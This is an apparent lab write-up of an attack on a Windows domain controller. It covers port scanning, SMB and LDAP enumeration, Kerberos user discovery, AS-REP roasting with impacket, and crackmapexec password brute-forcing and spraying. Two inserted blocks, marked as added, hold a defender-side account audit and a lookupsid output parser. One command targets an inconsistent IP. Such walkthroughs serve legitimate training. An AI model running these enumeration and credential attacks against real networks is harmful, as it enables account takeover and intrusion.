1. Information gathering
Port enumeration
sudo nmap -sT --min-rate 10000 -p- 192.168.241.149
Starting Nmap 7.92 ( https://nmap.org ) at 2024-08-04 00:49 CST
Nmap scan report for 192.168.241.149
Host is up (0.00079s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49722/tcp open unknown
49781/tcp open unknown
MAC Address: 08:00:27:DC:3B:4F (Oracle VirtualBox virtual NIC)
Service and OS detection on the open ports
sudo nmap -sCV -O -p$port 192.168.241.149
Starting Nmap 7.92 ( https://nmap.org ) at 2024-08-04 00:54 CST
Nmap scan report for 192.168.241.149
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-04 07:54:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49722/tcp open msrpc Microsoft Windows RPC
49781/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:DC:3B:4F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|10|2012|Vista (93%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_vista::sp1:home_premium
Aggressive OS guesses: Microsoft Windows Server 2016 (93%), Microsoft Windows 10 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (87%), Microsoft Windows Vista Home Premium SP1 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:dc:3b:4f (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-04T07:55:19
|_ start_date: N/A
|_clock-skew: 14h59m57s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.08 seconds
This is a domain controller; the domain is SOUPEDECODE.LOCAL
echo "192.168.241.149 SOUPEDECODE.LOCAL " | sudo tee -a /etc/hosts
SMB information
smbmap -H 192.168.241.149 -u guest
[+] IP: 192.168.241.149:445 Name: SOUPEDECODE.LOCAL
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
smbmap -H 192.168.241.149 -u guest -r
[+] IP: 192.168.241.149:445 Name: SOUPEDECODE.LOCAL
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 InitShutdown
fr--r--r-- 5 Mon Jan 1 08:05:43 1601 lsass
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 scerpc
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-2a4-0
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-3ec-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 epmapper
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-200-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 LSM_API_service
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-170-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 eventlog
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-404-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 atsvc
fr--r--r-- 4 Mon Jan 1 08:05:43 1601 wkssvc
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-2a4-1
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-540-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 RpcProxy\49678
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 01204ef74c9aa058
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 RpcProxy\593
fr--r--r-- 4 Mon Jan 1 08:05:43 1601 srvsvc
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 netdfs
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-290-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-998-0
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-9a0-0
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
smbclient -N -L \\192.168.241.149
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.241.149 failed (Error
smbclient -N '\\192.168.241.149\IPC$\'
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
User enumeration
Kerberos user enumeration
sudo nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='SOUPEDECODE.LOCAL',userdb=/usr/share/wordlists/metasploit/unix_users.txt 192.168.241.149
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@SOUPEDECODE.LOCAL
|_ administrator@SOUPEDECODE.LOCAL
MAC Address: 08:00:27:DC:3B:4F (Oracle VirtualBox virtual NIC)
RPC user enumeration
rpcclient -U ""%"" 192.168.241.149
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
rpcclient -U "guest" 192.168.241.149
Password for [WORKGROUP\guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> exit
LDAP user enumeration
ldapsearch -H ldap://SOUPEDECODE.LOCAL/ -x -s base -b ‘ ‘ “(objectClass=*)” “*” +
# extended LDIF
#
# LDAPv3
# base <‘> with scope baseObject
# filter: (objectclass=*)
# requesting: ‘ “(objectClass=*)” “*” +
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
ldapsearch -H ldap://SOUPEDECODE.LOCAL/ -x -b "" -s sub "(objectClass=*)" cn
# extended LDIF
#
# LDAPv3
# base <> with scope subtree
# filter: (objectClass=*)
# requesting: cn
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
sudo nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='SOUPEDECODE.LOCAL',userdb=/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt 192.168.241.149
Starting Nmap 7.92 ( https://nmap.org ) at 2024-08-04 02:30 CST
Nmap scan report for SOUPEDECODE.LOCAL (192.168.241.149)
Host is up (0.00028s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| charlie@SOUPEDECODE.LOCAL
|_ guest@SOUPEDECODE.LOCAL
MAC Address: 08:00:27:DC:3B:4F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 35.79 seconds
Try brute-forcing the user charlie
1. impacket-GetNPUsers
Function:
Requests the TGT (Ticket Granting Ticket) of users that do not require Kerberos pre-authentication.
The tool applies when the user account has the UF_DONT_REQUIRE_PREAUTH attribute set.
Usage:
impacket-GetNPUsers -dc-ip <DC_IP> <DOMAIN>/<USERNAME> -no-pass
Example:
impacket-GetNPUsers -dc-ip 192.168.241.149 SOUPEDECODE.LOCAL/administrator -no-pass
-dc-ip: IP address of the domain controller.
<DOMAIN>/<USERNAME>: the domain and username. A user account without a password can be used.
2. impacket-GetUserSPNs
Function:
Enumerates accounts that have a Service Principal Name (SPN) set and requests Kerberos TGS (Ticket Granting Service) tickets for them.
Used to obtain Kerberos TGS tickets, which can be cracked offline to recover the service account password.
Usage:
impacket-GetUserSPNs -dc-ip <DC_IP> <DOMAIN>/<USERNAME> -no-pass
Example:
impacket-GetUserSPNs -dc-ip 192.168.241.149 SOUPEDECODE.LOCAL/administrator -no-pass
-dc-ip: IP address of the domain controller.
<DOMAIN>/<USERNAME>: the domain and username. A user account without a password can be used.
Notes
Permissions:
Make sure to run with an account that has sufficient privileges.
impacket-GetNPUsers requires the target user account to have the UF_DONT_REQUIRE_PREAUTH attribute set.
impacket-GetUserSPNs requires an account with permission to read service account information.
Troubleshooting:
If impacket-GetNPUsers returns the error User doesn't have UF_DONT_REQUIRE_PREAUTH set, the target user account does not meet the condition.
If impacket-GetUserSPNs returns an invalidCredentials error, check that the correct credentials and domain information were supplied.
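As an added defender-side example (not part of this writeup), the property both tools depend on, expressed as an audit: accounts with UF_DONT_REQUIRE_PREAUTH set and user accounts carrying an SPN, plus the equivalent LDAP filters. The UF_* bit values and the bitwise-AND matching rule OID are real; the directory entries and SPNs are constructed sample data.

```python
# Added example (not from the original writeup): a defender-side audit for the two
# account classes the impacket tools above look for. UF_* values are bits of the AD
# userAccountControl attribute; the directory entries at the bottom are constructed.
UF_ACCOUNTDISABLE = 0x0002
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304, the flag GetNPUsers relies on

# The same two checks as LDAP filters for an authenticated ldapsearch against the DC
# (1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule).
ASREP_FILTER = ("(&(objectCategory=person)(objectClass=user)"
                "(userAccountControl:1.2.840.113556.1.4.803:=4194304))")
KERBEROAST_FILTER = ("(&(objectCategory=person)(objectClass=user)"
                     "(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))")

def classify(entry):
    """Findings for one account: 'asrep' (pre-auth not required, so an AS-REP can be
    requested without a password) and/or 'kerberoast' (user account with an SPN whose
    TGS is encrypted with the account's own password-derived key)."""
    uac = entry.get("userAccountControl", 0)
    findings = set()
    if uac & UF_ACCOUNTDISABLE:
        return findings  # disabled accounts are not issued tickets
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.add("asrep")
    is_machine = bool(uac & (UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT))
    if (entry.get("servicePrincipalName") and not is_machine
            and entry["sAMAccountName"].lower() != "krbtgt"):
        findings.add("kerberoast")  # machine and krbtgt keys are random, so excluded
    return findings

def audit(entries):
    """Map sAMAccountName -> sorted findings, omitting accounts with none."""
    return {e["sAMAccountName"]: sorted(classify(e)) for e in entries if classify(e)}

# Constructed sample entries; 0x200 is UF_NORMAL_ACCOUNT.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "charlie", "userAccountControl": 0x200, "servicePrincipalName": []},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200,
     "servicePrincipalName": ["MSSQLSvc/dc01.soupedecode.local:1433"]},
    {"sAMAccountName": "legacyapp", "userAccountControl": 0x200 | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": []},
    {"sAMAccountName": "oldsvc", "userAccountControl": 0x200 | UF_ACCOUNTDISABLE
     | UF_DONT_REQUIRE_PREAUTH, "servicePrincipalName": ["HTTP/old.soupedecode.local"]},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000,
     "servicePrincipalName": ["ldap/dc01.soupedecode.local"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202, "servicePrincipalName": ["kadmin/changepw"]},
]
```

Running audit(SAMPLE_ENTRIES) flags only svc_sql (kerberoast) and legacyapp (asrep); the disabled, machine and krbtgt accounts are skipped for the reasons in the comments.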
Brute-forcing user passwords
crackmapexec winrm 192.168.241.149 -u 'charlie' -p /usr/share/wordlists/rockyou.txt -d SOUPEDECODE.LOCAL
SMB SID user enumeration
impacket-lookupsid 'soupedecode.local/anonymous@192.168.241.149' > user
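An added example (not the writeup's own code) that parses impacket-lookupsid's "RID: DOMAIN\name (SidType)" lines into the plain username list the following commands read; the output lines are constructed samples with a placeholder domain SID.

```python
import re

# Added example (not part of the original writeup): parse impacket-lookupsid output
# into a plain username list. The text below is a constructed sample in lookupsid's
# "RID: DOMAIN\name (SidType)" line format; the domain SID is a placeholder.
SAMPLE_LOOKUPSID_OUTPUT = """\
[*] Brute forcing SIDs at 192.168.241.149
[*] StringBinding ncacn_np:192.168.241.149[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-0000000000-0000000000-0000000000
498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\\Administrator (SidTypeUser)
501: SOUPEDECODE\\Guest (SidTypeUser)
502: SOUPEDECODE\\krbtgt (SidTypeUser)
512: SOUPEDECODE\\Domain Admins (SidTypeGroup)
1000: SOUPEDECODE\\DC01$ (SidTypeUser)
1103: SOUPEDECODE\\charlie (SidTypeUser)
"""

# Names may contain spaces (group names do), so the name group is greedy and the
# trailing "(SidTypeXxx)" is anchored at end of line.
LINE_RE = re.compile(r"^(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+) \((?P<type>SidType\w+)\)$")

def parse_lookupsid(text):
    """Yield (rid, domain, name, sidtype) for each result line; other lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m["rid"]), m["domain"], m["name"], m["type"]

def user_list(text, include_machines=False):
    """Names of SidTypeUser entries; machine accounts (trailing $) dropped by default."""
    return [name for _, _, name, t in parse_lookupsid(text)
            if t == "SidTypeUser" and (include_machines or not name.endswith("$"))]

if __name__ == "__main__":
    print("\n".join(user_list(SAMPLE_LOOKUPSID_OUTPUT)))
```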
Kerberos roasting attack (AS-REP roasting)
impacket-GetNPUsers -dc-ip 192.168.241.149 SOUPEDECODE.LOCAL/administrator -no-pass -usersfile=user.txt
No TGT was obtained.
Use the obtained username list for brute-forcing
crackmapexec smb 192.168.241.47 -u user.txt -p user.txt --no-bruteforce --continue-on-success -d SOUPEDECODE.LOCAL
--no-bruteforce matches passwords to users one-to-one (each user is tried only with the password on the same line of the list)
Windows Remote Management (WinRM) username/password brute force
crackmapexec winrm 192.168.241.149 -u user.txt -p user.txt -d SOUPEDECODE.LOCAL
SMB username/password brute force
crackmapexec smb 192.168.241.149 -u user.txt -p user.txt